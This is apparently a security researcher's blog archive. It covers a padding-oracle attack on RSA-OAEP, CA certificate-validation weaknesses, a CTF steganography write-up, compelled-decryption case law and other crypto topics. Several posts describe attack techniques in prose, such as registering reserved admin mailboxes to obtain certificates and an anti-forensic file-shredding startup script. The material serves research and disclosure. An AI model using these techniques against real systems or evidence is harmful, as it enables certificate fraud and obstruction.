Getting applications running in BOINC is a bit of trial and error. If it's an open source application, you have to patch it a little bit and if it's closed source you have to write a job.xml file defining how to run the application. In either case you have to define input and output templates that let BOINC know what files to send with the workunit and to expect the program to produce. And when I was sending a couple hundred MB wordlists and resource files, I wanted to compress them and decompress them on the client, so that added a little bit of work too. To try and make it easier on you, I've released all the scripts, templates, config files, and patches I created while working with BOINC. I've also not just released my slides, but annotated them with links to the reference material for everything mentioned. Everything is up on github.

I've wanted to factor large numbers for a while, and this was actually what got me into this whole mess. I have some (simple) observations about factoring using the General Number Field Sieve, as well as instructions for how to do it yourself (with or without BOINC).

I have to thank Leonardo and all the ekoparty organizers for putting on a great conference. They went out of the way to make the international arrivees as comfortable as possible, and even had simultaneous translation from english to spanish and from spanish to english. Buenos Aires is a wonderful city, and I really recommend you visit!

This writeup originally appeared on the Gotham Digital Science blog.

Non-Persistent PGP Keys

3 Aug 2011 16:09:36 PST

I just got out of Dan Kaminsky's talk at Black Hat where he talked about a myriad of topics, but the one I want to focus on was his tool Phidelius. It's a library you reference with LD_PRELOAD that hooks /dev/random, /dev/urandom and some other functions that un-randomizes the random data that key generators like gnupg, openssl, or ssh-keygen uses.

Why would you want to do that? Well, instead of using a random stream of bytes - it uses a reproducible stream of bytes based off a password/passphrase. The bytes could come from any key derivation script, but both Dan and I chose scrypt, by Colin Percival.

His tool is considerably more robust than mine and works with many different programs without modification - mine specifically generates OpenPGP keys. And as he noted in his talk - while you can do this - that doesn't mean it's a good idea.

The idea has probably been public for some time now, although I couldn't find an example of - and since Dan has shouted it out, I figured now's the time to release my code and let people play with it while they're interested. Anyway, there are a ton of caveats, some of which I'll list:

This is pre-alpha. There may be straight-out-bugs in my code.
Two people using the same password and scrypt keys would generate the same public keys. I think this is less of an issue than Dan, I assume people using my code would use strong passphrases.
While it works and is usable, it relies on a bunch of tricks/hacks.
The public key generated has a different KeyID each time, because the KeyID is a hash over the public key parameters, which includes the date it was created.
This may generate keys +/- a few bits off the stated length (2047 instead of 2048)
The key generated is unencrypted - meaning there's no passphrase on your secret key.
You'd have to have a crazy threat model for this to be a good idea.
You don't have that threat model, and if you do, you still shouldn't use this code in real life.

The code is located here.

US v Fricosu - Compelled Disclosure of Encryption Keys

11 Jul 2011 18:36 EST

I am not a lawyer, and this blog does not constitute legal analysis. It should be taken merely as speculation and pointers to topics for you to do your own research on. Throughout this blog post I'm going to use this notation to indicate a word has a specific legal definition, and I'm not using the word colloquially.

One of the biggest targets of armchair lawyers on blogs, twitter, and reddit (myself included) has been whether or not the government can force you to turn over your encryption key. An actual lawyer, a law professor in fact, has written a series of posts on the theory, and details of the two cases that address the issue.

Encrypted Hard Drives and the Constitution - August 23, 2006 - The first time the question is raised, in a purely hypothetical way. It lays some information down you should fully grok - for example Miranda rights don't apply in many cases because you are not in custody and the 5th Amendment does not apply because you are not being compelled to produce testimony. It references the 1988 Doe vs United States case which addressed the question of applying the 5th Amendment to physical evidence (like a key to a safe) and to communication (like a memorized combination to a safe).
Court upholds using the Fifth Amendment to refuse to disclose your password - December 15, 2007 - The first post regarding an actual case, United States v. Boucher. The U.S. District Court for the District of Vermont held that Boucher could invoke the Fifth Amendment and refuse to comply. It again goes into detail about testimony and custody.
5th Amendment Bummer - March 06, 2009 - An update on United States v. Boucher. The Government appealed, and modified their request. Now they were no longer after the password, but instead were trying to compell Boucher to show the unencrypted files to a Grand Jury. They crucially changed the argument from communication (exempt via the 5th amendment) to producing physical evidence (not exempt, see Doe vs United States 1988). The court bought the new argument and stated Boucher must produce the unencrypted contents by the date specified or be held in contempt (which amounts to sitting in jail until you comply).
Passwords and the 5th Amendment Privilege - April 28, 2010 - This post addresses U.S. v. Kirschner a case in the U.S. District Court for the Eastern District of Michigan. The government erred in this case by specifically seeking testimony and even using the analogy "It's like giving the combination to a safe." which we mentioned earlier was protected. The government's subpoena was quashed.

Now, updates on those two cases. According to the headline article "Boucher eventually complied and was convicted." Brenner speculated the government would appeal to the 6th Circuit in Kirschner (and based on the Obama adminstration's judicial actions I would expect so too), but I haven't been able to find any evidence of that - so I'm not sure what happened to Kirschner.

Now let's examine the current case - US vs Fricosu. It's in the United States District Court for the District of Colorado. I'm not sure how Fricosu is represented, but the case gained attention after the EFF filed an amicus brief in the case Friday. If you're unfamiliar with the term, it does not mean the EFF is involved in the case or representing Fricosu, only that they're interested in it and presents a supporting arguement to the court on behalf of Fricosu.

Now, again, I don't know the exact request made by the prosecutor, but quoting the article:

Prosecutors stressed that they don't actually require the passphrase itself, meaning Fricosu would be permitted to type it in and unlock the files without anyone looking over her shoulder. They say they want only the decrypted data and are not demanding "the password to the drive, either orally or in written form."

As we saw in Boucher, this doesn't bode well because they're taking the physical evidence approach. ~~The best-case scenario is the prosecution argues the physical evidence approach and the court strikes it down. We'll have to wait and see.~~ Now the EFF argues in their Amicus Brief that producing the decrypted contents should not be required, because doing so is testimony. Specifically, the government has not shown that Fricosu has control or knowledge of the contents of the laptop, therefore by decrypting the contents she is testifying to authority. (This has to do with the legal term forgone conclusion.) You should definetly read the brief as it goes into a lot of precedence and case law. It's also worthwhile to note that in Boucher, the contents of the encrypted drive were a forgone conclusion as Boucher has previously revealed them to a Customs officer.

But there are some other evidentiary issues here. You should definitely take this with a grain of salt - I've read Law School Evidence books, and did not do well on the practice tests. With computer cases, there's a lot of chain of custody, verification stuff that's got to be done. Image the drive, use a write-blocker, show the chain of custody that it couldn't have been altered... But the process they are describing would shoot the normal evidence handling process to hell. It'd be near-impossible to satisfy both sides.

Consider the case where Fricosu enters the password into a specially built program that's designed to decrypt with write-blocker and preserve evidence. Fricosu would have a strong argument the government could actually obtain the passphrase from her via subtle means. (I'm assuming the drive in question is the boot drive on a laptop - if it was a truecrypt container, the scenario changes.) While there may be assurance the evidence wouldn't be altered, there is none the government isn't taking the passphrase. (Now there could be some shenanigans with the government granting immunity for the passphrase but not the contents... I'm not sure how that'd work.)

Now consider the case where Fricosu enters the passphrase for the laptop in court in front of the grand jury - no write-blocker involved and no protections in place. Fricosu would have an argument that the evidence could have been altered and should not be admitted (e.g. by normal operating system boot-up, or a malicious virus on the machine, or simply by a script she wrote to delete sensitive files on startup). These issues can be overcome by the court, but they are argued on their own. Brenner has written articles in this area as well. On this topic, it'd be trivial for me to write a startup script on my machines that says "Have I been turned on in the last 2 months? No? Okay, shred all the sensitive stuff...."

Another nice thing about this case is that unlike Boucher and Kirschner; Fricosu isn't accused of child pornography. I imagine it's difficult for lawyers to argue civil liberties when the individual you're protecting is rather obviously someone involved in transporting or concealing child porn. Certainly there are arguments that everyone deserves a fair trial - and they do... but there's also the reality of the crime.

Update: July 20, 2011 Susan Brenner of the previously super-linked cyb3rcrim3 has graciously obtained the government motion in the case, sent it to me, and allowed me to post it before her. You can download the pdf here or view it in google docs.

The motion doesn't go into details about what type of encryption software was used, but do imply that the entire computer is protected - so probably PGP WDE or Truecrypt. It gives several details that apply to the arguement of whether or not Fricosu has control or knowledge of the computer, and also directly says:

As the act of production might potentially entitle Ms. Fricosu to assert her right to refuse under the Fifth Amendment of the United States constitution, the Government has sought approval to seek this court's grant of limited immunity, thus precluding the Government using her act of producing the unencrypted contents against her in any prosecution.

One of the last arguments made by the EFF in their amicus brief is that Fricosu is justified in refusing to provide the password because that limited immunity does not include a "guarantee against use or derivative use of the information". That is:

When a witness's act of production is testimonial in character, the government must grant use and derivative-use immunity to satisfy the Constitution.s requirements. Hubbell I, 530 U.S. at 41-46. This means that the government may not use the act of production itself against Fricosu, nor any evidence on the computer derived from the act of production. ... Should the Court decide that Fricosu must supply the data on the laptop in decrypted form, the government will face a .heavy burden of proving that all of the evidence it proposes to use [from the laptop] was derived from legitimate independent sources. (emphasis mine)

The strongest argument is this: "I do not believe he can be compelled to reveal the combination to his wall safe". But where does it come from? From the Supeme Court Case Doe v United States 487 U. S. 201 (1988). But it wasn't the major finding of the case. Rather, it was made in two places. Second, most plainly, in a comment by Justice Stevens in a dissenting opinion: "He may in some cases be forced to surrender a key to a strongbox containing incriminating documents, but I do not believe he can be compelled to reveal the combination to his wall safe -- by word or deed." And the first, a weaker one, in an implication in a footnote of the Majority Opinion:

We do not disagree with the [prior statement] that "the expression of the contents of an individual's mind" is testimonial communication for purposes of the Fifth Amendment. We simply disagree with the [prior conclusion] that the execution [at issue here] forced petitioner to express the contents of his mind. In our view, [the compulsion] is more like "being forced to surrender a key to a strongbox containing incriminating documents," than it is like "being compelled to reveal the combination to a wall safe."

I heavily hacked that up to make it easier to understand absent details of the Doe case, you can see it in the original form by searching for "wall". But lawyers are really good at this. The majority opinion did not say that the wall safe was protected speech like Stevens did, only that this instance was unlike a wall safe. I think it's plain to see that a wall safe is a very good analogy for encryption. They're not perfect - but a very good wall safe could not be opened forcibly without destroying the papers inside, and good encryption cannot be opened reasonably. We have to hope the court finds that producing the contents of a wall safe or encrypted container would be an "expression of the contents of an individual's mind".

Now I wonder about keyfiles. If the government didn't know how to unlock a truecrypt container, they could try to compell you like this. But there is no password. And you tell them this, you tell them it is unlocked with a keyfile. So they demand you produce the keyfile. Here's where it gets tricky... Could you say "You have the keyfile already, and my telling you which one it is is protected."? You can't prove they have the keyfile without giving it to them - there's no zero-knowledge proof possible here. Any attempt to construct one would fail because no judge would accept the rigor required for a zero-knowledge proving. I wonder how keyfiles would be treated...

I expect to update this over the next few days as details emerge. Updates will not trigger a new RSS entry, but will be announced on Twitter.

Beyond Padding Oracle - Manger's Oracle and RSA OAEP Padding

2 Jun 2011 12:56:34 EST

Several months ago I was looking at the proceedings from #days 2010 and read Pascal Junod's slides Open-Source Cryptographic Libraries and Embedded Platforms. In them, he mentioned James Manger's attack on RSA OAEP, a padding scheme first defined in PKCS #1 v2.0. I hadn't heard of it before, and it interested me enough to investigate. (The paper is available via Google or ACM if you're a member.)

The basics of the attack are similar to the Padding Oracle attack in that a small piece of information is exposed via error messages and doing some clever math you can use that to retrieve the plaintext from the ciphertext. After the ciphertext is decrypted, the OAEP decoding process begins. The decrypted plaintext is supposed to fit in one less byte than the maximum size of the ciphertext. If the plaintext does not have a 00 in the highest byte, the ciphertext is considered to have been tampered with and an error is returned. Because of the properties of RSA, you can directly influence the plaintext p by multiplying the ciphertext c by x^e mod n - where e is the exponent from the public key, n the modulus, and x the arbitrary number you want to multiply the plaintext by. This will produce a plaintext p*x mod n after decryption.

Manger's Oracle relies on manipulating the plaintext and detecting when it has overflowed into the highest byte. Using a method reminiscent of binary search, the possible values of the plaintext are narrowed down until only one remains - allowing recovery of the plaintext from the ciphertext. The number of oracle queries needed depends on keysize; for 1024, it's around 1200.

I checked the popular implementations of RSA-OAEP and found none of them vulnerable to Manger's Oracle. OpenSSL specifically protects against it, calling Manger out by name in the comments. BouncyCastle and the .NET implementation were secure because they didn't throw an error if the first byte was non-zero (probably on the assumption that another part of OAEP, the hash, wouldn't match). Libgcrypt didn't implement RSA-OAEP - a patch had been provided a few years ago, but it was never merged... until a few weeks ago when it was committed to trunk.

The new code wasn't actually directly vulnerable - the same error code was returned no matter the type of error that occurred. Regardless, I decided this would be a fun exercise and set about implementing the attack. I got it working; but only after editing the source of libgcrypt to 'cheat', providing my own oracle. I managed to find a mistake in the original paper too, a floor() that should have been a ceil() - detailed in the code linked later.

Since I modified the libgcrypt code to provide an oracle, it was an overly contrived example, but it seemed like it might be possible to exploit it using a timing attack. After measuring and graphing the differences between the two cases, I saw you could determine the error from timing information - so long as you looked at the percentiles over a sufficient number of trials, as shown below. It isn't 100% reliable, but I was able to get a working proof of concept going with just timing information.

Left two box plots show the longer execution time, right two show the shorter.

I've published the code to exploit the oracle in a contrived case, and included the code and steps to demonstrate the timing differential. The code is on github, and as far as I know, this is the only public implementation of Manger's Oracle. (Although apparently it is assigned as homework somewhere...)

"OAEP Padding" is indeed an example of RAS Syndrome

This writeup originally appeared on the Gotham Digital Science blog.

Examining the CA/Browser Forum Requirements Draft

25 Apr 2011 23:36 EST

I've heard it from three different sources: Certificate Authorities will make verification more painful, more costly, and more difficult - but only if they're mandated industry-wide. They can't add overhead their competitors can skip on. The CAs and Browsers have been working together in the CA/Browser Forum to come up with new requirements for Certificate Authorities. The Public Comment period on the draft of these requirements is ongoing until the end of May, and takes place on mozilla.dev.security.policy. I read through the draft, and I didn't have many actual comments (aside from one question I posted to the SSL Observatory list and one clarification I requested) - but I wanted to highlight a few points from it.

The requirements are "a subset of the requirements that a Certification Authority must meet in order for its Certificates to be Publicly Trusted." They apply only to SSL/TLS Certificates: "Similar requirements for code signing, S/MIME, time-stamping, VoIP, IM, Web services, etc. may be covered in future versions."

It talks a lot about verification requirements to ensure the applicant is who she says she is in the event the cert will contain Subject Identity Information, but more importantly talks about how the domain and/or IP addresses will be verified:

If the CA uses the Internet mail system to confirm that the Applicant has authorization from the Domain Name Registrant to obtain a Certificate for the requested Fully-Qualified Domain Name, the CA MUST use a mail system address formed in one of the following ways:

Supplied by the Domain Name Registrar

Taken from the Domain Name Registrant's .registrant., .technical., or .administrative. contact information, as it appears in the Domain's WHOIS record

By prepending a local part to a Domain Name as follows:

Local part - One of the following: "admin", "administrator", "webmaster", "hostmaster", or "postmaster"

Domain Name . Formed by pruning zero or more components from the Registered Domain Name or the requested Fully-Qualified Domain Name.

So the old trick of registering one of these reserved email addresses might just work depending on the domain. And if the domain uses Anonymous Whois (Proxy Registration), that organization must be contacted to confirm the application is legit (so you could target those guys).

What is interesting though, is the wording in that section, emphasis mine: "If the CA relies on a confirmation of the right to use or control the Registered Domain Name(s) from a Domain Name Registrar", "If the CA uses the Internet mail system to confirm", "If the Domain Name Registrant has used a private, anonymous, or proxy registration service". It's a bunch of If's. There's no MUST or SHOULD stating that one of these methods are the only allowed.

Which lead me to ask about it - are these the only methods? Is this vagueness intentional? I gave the example of another verification method being via telephone from the WHOIS information. The responses are coming in privately and will be posted shortly I'm sure - but it does seem to be intentional. As Ian G says "the high level document should state the high level requirement, and leave implementation to the CA". He goes on to say that the audit process intended to ensure that the implementation is valid. (I'll talk about that below.) And Stephen Davidson mentions "There are a number of US patents covering aspects of domain validation for SSL certificates. The BR has to tread a fine line between laying out good practice and requiring CAs to follow a process that might intrude on a patented process." Sheesh. Patents on how to check someone's ID. /grumble

Edit:It seems this topic may have been accidently double posted (I submitted it first under a topic and a couple days later after it never showed up as a reply). The two threads are BR11.1 Authorization by Domain Name Registrant and BR11 -Validation Practices. A proposal to have methods listed in a wiki page referenced by the requirements has seen support, to ensure the methods are acceptable. There's definetly some questions about how that would work (can methods be removed? what's the approval process?) - but it's a step forwards and what I wanted to point out.

This next bit about audits is notable:

At least once every eleven to thirteen months following the previous independent audit (in order to accommodate an auditor's schedule), the CA MUST be independently examined for compliance with the requirements of one of the eligible audit schemes listed in Section 16.1.
...
The audit report MUST be made publicly available. For both government and commercial CAs, the CA SHOULD make its audit report publicly available no later than three months after the end of the audit period. In the event of a delay greater than three months, and if so requested by an Application Software Supplier, the CA MUST provide an explanatory letter signed by its auditor.

An "Application Software Supplier" is one of Apple, Google, KDE, Microsoft, Opera, RIM, and Mozilla. More interesting are the "eligible audit schemes" listed:

WebTrust for Certification Authorities v1.0 or later
ETSI TS 101 456 v1.2.1 or later
ETSI TS 102 042 V1.1.1 or later
ISO 21188:2006, completed by either a licensed WebTrust for CAs auditor, or an audit authority operating according to the laws and policies for assessors in the jurisdiction of the CA
If a Government CA is legally required to use a different internal audit scheme, it may use such scheme provided that: (a) the audit encompasses all requirements of one of the above schemes, and (b) the audit is performed by an Appropriate Internal Supervisory Government Auditing Agency, separate from the CA, that meets the requirements of Section 16.4.

Since the people who read audit schemes and the people who read this blog are wholly orthogonal - here's some light details. First off, these are audits, not penetration tests or code review. And if we learned something from the Comodo debacle (assuming you believe the posted code) - it's that poor code and mediocre defenses do exist even in critical endpoints. The types of issues that exist in the nitty-gritty (hardcoded passwords, exposed administrative interfaces, password-based authentication instead of client certificates, and conceivably whatever bug enabled the Iranian to get the DLL in the first place) - should have been identified by a pen test. But an audit is more likely to gloss over the details.

But, putting aside my feelings of an audit compared to a penetration test (or an 'Advanced Persistent Test' if you're AR), it is encouraging that the audit report is required to be make available.

There's this small bit:

The CA and its RAs SHALL NOT archive the Subscriber Private Key.

If the CA, or any of its designated RAs were to generate a Private Key on behalf of the Subscriber, then the CA MUST encrypt the Private Key for transport to the Subscriber.

If the CA, or any of its designated RAs were to become aware that a Subscriber's Private Key had been communicated to any person or organization not affiliated with the Subscriber, then the CA MUST revoke any certificates that include the Public Key corresponding to the Private Key that has been communicated.

I don't see SHALL used too often, but it is a synonym for MUST, to save you the time of looking it up.

Now, for the paranoid crowd: what about collusion between a CA and the government? If it was proven that a CA had issued a cert for government interception, that CA would pretty quickly be untrusted by users, and probably browsers as well. It's incentive for a CA not to do so, since such an action puts its business at risk. But let's check the relevant sections of the doc:

8.1 Compliance

The CA MUST at all times: Comply with all law applicable to its business and the Certificates it issues in each jurisdiction where it operates

Could a judge order a CA to do the government's bidding and sign a CSR for law enforcement? Well, practically speaking I'm not qualified to answer this. There's not a lot of people who are. I credit Dino Dai Zovi when I say: "The people who are qualified to speak about the topic won't and can't, so by definition the only people speaking are people unqualified." I'll just note that by stretching parts of the Requirements (stretching "right to use, or had control of, the Domain Name and IP address") and emphasizing compliance with applicable law - they'd have somewhat of a defense from an industry sanction. Not from the people on the internet of course.

Now what about law enforcement trying force a CA to revoke a cert? This was a wondering I had that I posted to the SSL Observatory list. It came about from the following segments:

10.3.2 Agreement Requirements

The Subscriber Agreement MUST contain provisions imposing on the Applicant itself (or made by the Applicant on behalf of its principal or agent under a subcontractor or hosting service relationship) the following obligations and warranties:

Use of Certificate: An obligation and warranty to install the Certificate only on servers that are accessible at the subjectAltName(s) listed in the Certificate, and to use the Certificate solely in compliance with all applicable laws and solely in accordance with the Subscriber Agreement

...

12.2.3 Investigation

The CA MUST begin investigation of a Certificate Problem Report within twenty-four hours of receipt, and decide whether revocation or other appropriate action is warranted based on at least the following criteria:

The nature of the alleged problem

The number of Certificate Problem Reports received about a particular Certificate or Subscriber

The type of the complainants (for example, a complaint from a law enforcement official that a Web site is engaged in illegal activities should carry more weight than a complaint from a consumer alleging that she didn't receive the goods she ordered)

Relevant legislation.

The certificate recipient must abide by "applicable laws" - but those laws may differ from the Certificate Authority's. Then a specific scenario of law enforcement complaining to a CA is given. When you couple that with the DOJ's over-reaching domain name seizures - well, personally I think it's a matter of when, not if, the government uses this tactic to harass sites extra-jurisdictionally.

Regional Broadcast Using an Atmospheric Link Layer

1 Apr 2011 00:00:00 GMT

I've been working on a document for a while, and I'm happy to announce it's made it's way through the committees and has been accepted by the IETF. It's the result of about 2 years of (non-contiguous) idle thought, bouncing ideas off people, and editing. But what is it about?! Well, as the internet has grown the concept of a LAN changed from the original concept of a Local Area Network where "Local" meant geographic. Now, "Local" is a logical grouping - a company has a LAN, but its members are spread through the globe, linked by VPNs. I wanted to get back to geographic based packet transmission. It's all the rage after all - every social media app wants to show you what's happening nearby, where your friends are, and so on.

So this is my contribution. Using the methods defined in the RFC, you can transmit text or binary data to a local geographic area. It doesn't add congestion on existing copper or fiber, it's carrier independent, it doesn't require or deplete mobile data plans. You can use it just as easily in New York City as in Kigali. And since we care about regional transmission, we can adapt some settings to local standards, like the UTF Code Page most common. Anyway, here it is: RFC 6217: Regional Broadcast Using an Atmospheric Link Layer.

There are a few rough patches in there regarding technicalities or practicality (trust me, I agonized over them), but I think they accurately indicate the point behind the illustration.

Update: I made Slashdot

bleed-through badges

9 Feb 2011 23:36:00 EST

I got some bleed-through badges at a client the other month. I was curious to see if I could somehow prevent the bleed-through, and you absolutely can.

NYU Poly CSAW CTF Finals Challenge

18 Nov 2010 23:08:34 EST

A few weeks ago NYU Polytechnic held the final round of their Capture the Flag. Marcin previously wrote about his challenge for the qualification round. We both wrote challenges for the final round, and my challenge was primarily based around steganographic tricks with file formats, surrounded by some simple cryptography.

Introduction

The first things you received were a bat script and a multi-part file, without an extension. The bat file copied the second file twice and appended .jpg and .zip extensions as hints. It's a fairly well known secret that you can combine jpg and zip files into a single file, and it's 'valid' as both - but 'valid' is in quotes for a reason. You actually need to do a bunch of byte manipulation to get this into a legal format - you can read about how it works over in my stackoverflow answer here.

The jpg-part of the multi-part file was a reference to the movie Hackers, after which the challenge was themed. Within the zipfile-part was an executable which when run would look for the multi-part file and then display a prompt:

Entering Hackers-themed words would get you images, an mp3 snippet, hints, and even the hacker's manifesto:

Exploring the Code

But none of these were the key of course. .Net is trivial to disassemble, and I was counting on that. The code in the program seeks past the jpg-part of the multi-part file, and then reads blocks of data from the middle - stopping when it reaches the zip-part of the file. (So the file had three parts: jpg, zip, and in-between: an arbitrary binary format). The password entered is hashed, and used to key a dictionary. The value of the dictionary is used to attempt decryption of each block of data read from the middle of the file. When it succeeds it will - depending on a sentinel byte - show an image, text, play a song, or write out a file. Now because you can disassemble the program - you can see all the dictionary values, and therefore you can decrypt the blocks of data without ever needing to know the password.

But that would be too easy - so not all the encryption keys are in the dictionary. If your hashed password is not found in the dictionary, it is used itself. The encryption algorithm chosen was XTEA, and the key itself was neutered down to 27 bits. The encrypted blocks were easily brute-forced. (And XTEA is a very simple algorithm to implement).

After you brute-forced all the blocks and matched up their corresponding filetypes from the code, you were left with a slew of images, an mp3, several textfiles, and two very promising files with the extensions .key.gpg and .txt.gpg. Upon examining these files with gnupg, you found that .txt.gpg was an asymmetrically encrypted file with a key you did not possess; and .key.gpg was symmetrically encrypted with a passphrase you did not know.

You discovered that in the .key.gpg file - either through verbose gnupg output, looking at it in a hex-editor, or by running strings - there were a number of userid and marker packets at the end of the file. (The OpenPGP file format is a collection of different types of packets.) These extra packets contained the string "dot", "dash", or "PGP". Dot and dash were morse code, and PGP was the letter-delimiter, and it decoded to the word 'morse' - which was the passphrase to the file.

Upon decryption, you had a .key file, which was the public and private key used to encrypt the second .txt.gpg file - but without any indicator of what the passphrase was. Again, either through gnupg options, a hex-editor, or the 'strings' utility - you found that the preferred keyserver for the key was set to a particular URL. When you visited it, you were given the passphrase, and the file decrypted to a text file containing the key for the CTF.

Aftermath

When the files were given to the teams, they also received a hint that the challenge would require brute forcing - Julian Cohen (one of the CTF organizers) and I argued back and force for a while about whether it was acceptable, and how much time it should take. I wanted the teams to only have enough time to run their program twice - while Julian felt it should be instant. He argued they didn't have much time (the competition was 5 hours for a half-dozen challenges) while I argued they should understand the code and write it correctly the first time - I didn't want the challenge to become trial and error. In the end, not only did they get a neutered keyspace (27 bits took me 5 minutes to run) but they received the challenge the night before. However, the hint given threw off at least one team - they spent a long time finding hash collisions in the first 27 bits of the MD5 output.

In the end, this was the challenge solved by the most teams. I don't know if it was because they spent more time on it than other challenges by receiving it early, because they could easily retrieve the code so the challenge was more accessible to them, or if it was just too darn easy. I'll have to start brainstorming next year's challenge... If you'd like to attempt the challenge yourself, you can download the multi-part file.

Bonus Trivia

This challenge is extremely small - the multi-part file weighs in at only 220KB, despite containing many photos and a small snippet of an mp3. While I had parts of the code from a project a year ago, the bulk of the challenge was actually written for a Hackers-Themed party in Brooklyn where I intended to distribute the challenge on 5 1/4" disks:

Unfortunately, both of my 5 1/4" drives not only didn't work, but blew out one of my motherboards. I had to resort to 3 1/2" disks. However, since only one of my friends I gave it to was even able to find a 3 1/2" drive, I decided to repurpose the challenge (adding the gpg elements, neutering the key) for the CTF. Apparently I could have handed out blank 5 1/4" disks and no one would have known the difference. As a final aside, in a fresh box of multi-colored 3 1/2" disks sitting on my shelf since the '90s, the green disks exihibited a much higher failure rate than the others: 7 dead green disks, 2 dead orange, 1 dead yellow, and 0 dead red or blue.

This writeup originally appeared on the Gotham Digital Science blog.

an explanation of ElGamal Encryption

09 Nov 2010 17:15:34 EST

There's a million and one explanations of how RSA Encryption works, but significantly fewer on ElGamal - which is used more often these days (at least, based on the default key selection in gnupg). I tried my hand at explaining it from near-first principles. I don't expect you to know any group theory, so I cover that, but you should know what modulo and asymmetric cryptography are. Here's my attempt at explaining ElGamal.

ClickOnce MITM Attacks

21 July 2010 00:44:23 EST

I wrote a bugtraq post about the Microsoft ClickOnce Installer/Updater system, and how it's relatively easy to strip away code signing and man-in-the-middle an update and inject your malicious code. Here's the writeup.

Detecting SQL Injection in a White-box Environment

07 June 2010 10:14:23 EST

The idea is simple. You want to detect SQL Injection, when you have full access to the code and a QA team. You need to audit massively complex code that spans several servers and involves validation that may be happening on any of them, or the client in javascript. You want to be able to bypass the javascript validation in whole - but not rewrite any javascript or do anything complicated - because you don't want to retrain any QA people - or even have to teach them what SQL Injection is.

The idea is you put a proxy between the client and the web tier that rewrites requests to be an injection, and run a trace on the database to see if the injection ever makes it into the query. It doesn't work in all cases, and sometimes there are better approaches - but it's another option, and it has a few advantages. Check out the article for diagrams, code, and some enhancement ideas.

why event validation exists in ASP.Net

01 May 2010 10:53:23 EST

The other day I had cause to trigger an event firing in ASP.Net without actually having the user trigger the event, so I went about figuring out how that worked. It was simpler than I thought it would be, and it got me thinking about triggering events maliciously. I put together a vulnerable sample project, went to trigger it, and ran smack into ASP.Net Event Validation - which exists to thwart this exact attack. Disappointing

But I remembered other cases where I had run into it, and I refreshed myself by reading K Scott Allen's blog posts (first result on google too!). Long story short, even though Event Validation exists, it may not always be turned on - because there are legitimate places where it makes life super annoying.

So here's how to hack it if Event Validation is turned off. And a good reminder to developers why you should think twice before disabling it on a single page (or god forbid - site-wide).

finding the columns in a user defined type in SQL Server and IISAPP in IIS 7

Apr 8 2010 16:00 EST

This took me way too long to figure out, so I'm blogging it. If you want to find the columns in the user defined type you just defined and forgot about here's what you do:

create type ImGoingToForgetThis table (
	[id] int,
	[ie] int,
	[if] int
)
--Now close your query window...
exec [sys].sp_table_type_columns_100_rowset 'ImGoingToForgetThis'

Likewise, if you want to run the iisapp.vbs utility in IIS7 - it was replaced. Instead drop this vbs script into %systemroot%/system32:

sub shell(cmd)    
	dim objShell
	dim result
	Set objShell = WScript.CreateObject( "WScript.Shell" )
	Set oExec = objShell.Exec(cmd)

	Do While Not oExec.StdOut.AtEndOfStream 
		output = oExec.StdOut.Read(1000)
		WScript.Echo output
	Loop
end sub

shell "C:\Windows\system32\inetsrv\appcmd.exe list wp"

i have created comments

21 Feb 2010 20:11 EST

I have given you all the ability to comment on my blog. It's something that's been horrendously lacking for quite some time, and my only excuse is that there are so few people reading this it doesn't make much of a difference. But now they are here and all 12 of my feed subscribers can come and comment.

It was actually more difficult than you'd expect, because I don't use any blog software - I write everything in HTML in emacs, and until the comments system, there was no database. So integrating it was both an exercise in architectural integrity, and philosophy - I didn't want to let you comment until the comments behaved the way I wanted them to. Mainly I wanted them to degrade gracefully, not slow down the page, and enable you to write a comment that was as thoughtful as a blog post, and formatted to same precision. The solution of course was *markdown* - which takes plain text like _this_ and changes it to this.

Oh, and since I rolled my own comment system, you'd be legitimately concerned about whether it was any good at escaping user input. I'll freely admit that I had it pretty much done, then found that every single comment field (Name, Website, Comment, Email) could be exploited. But I closed all that up. And I believe a man is only as good as his word: Exploit my comment system and I'll pay you $20. So go read my code which I've graciously provided, and start fuzzing. Here, this might help.

Update: Someone managed to break markdown, which in turn caused a javascript error in chrome. So whoever that was, identify yourself and I'll buy you a cookie =)

Second Update: My friend and general pythonista Jay Moiron broke my json encoding, proving his point that I should have used simplejson from the beginning. I relented, and fixed it.

Who's Your Survivor?

29 Jan 2010 07:36 EST

It's a well-popularized piece of trivia that during the State of the Union, one cabinent member stays behind, and doesn't attend, just in case someone manages to kill the first 17 or so people in the line of succession. 2 days ago (Jan 27, 2010), Shaun Donovan (Secretary of Housing and Urban Development) was the designated survior. As an aside - he wouldn't actually have been sworn in, as Secretary of State Hillary Clinton was in London and hence would have succeeded. (One must wonder about the logistics of who gets to have a nuclear football in times like those.)

Anyway, several years ago I interned at Bare Necessities (semi-NSFW) where I absorbed a wealth of information about female undergarments that seems out-of-context and creepy today. But besides learning the difference between a G-String and a Thong, I learned something about Operation Management. Apparently one day, the entire tech team (5-6 people) went out for a sit-down lunch, and when they got back the site was down and had been for about an hour. After that, there was a semi-joke, semi-serious rule that the entire tech team could not go out to lunch together.

Reddit learned that lesson yesterday. To summarize the post, 3/4 of their tech team was at google interviewing Peter Norvig, and the other 1/4 was in NYC going to meetings. The site suffered an ad attack followed by an outage - and the best the could do was huddle in Google's lobby working on laptops to fix it.

At my current job, there are around 2 dozen people who have access to production, split amongst Database Guys, Development, and Infrastructure. We have on-call lists, with priorities running down, and automated alerts - we're pretty good about it. But then I realized - what's the one event, that usually (not always, but usually) manages to incapaitate >85% of the entire tech team? That's right - Company Party. It's never come up, to my knowledge, but the thought of my bosses, slightly-to-very intoxicated, huddled around the single guy who brought his laptop to the party - all wanting to just rip it out of his hands and do it themselves - well, it amuses me.

Architecture of Buenos Aires

27 Jan 2010 04:36 EST

Before I decided to major in Computer Science, I looked at schools for Architecture. And while I obviously never majored in it, I still am drawn to it. I eventually ran across a blog called Scouting NY a year or so ago, and it instantly became one of the feeds I would look forward to in my feed reader. The Scout's job is to scout locations for films, and in doing so he blogs about some of the interesting things you can see in NYC if you actually pay attention. He's shown me some amazing sights in New York - and even better he's taught me to open my own eyes and find them for myself. I thought I would pay him some homage and show three buildings that have struck me while I'm staying in Buenos Aires.

Firstly, I have this building - which I know nothing about. It's on Belgrano a few streets south of Plaza de Mayo - and as far as I know it just an apartment building. But compare it to the buildings next to it - it's clearly an order of magnitude more impressive. Take a look at the facade - the tiny faux-balconies, the columns running down it, and the bay windows at the corner.

And then there's two incredible sets of ornamentation. First is the statutes. In Buenos Aires they're refered to as Las Caras - literally The Faces. Each seems to be supporting the weight of the building on his shoulders, and each is slightly different - one is holding a pickaxe, another a chain.

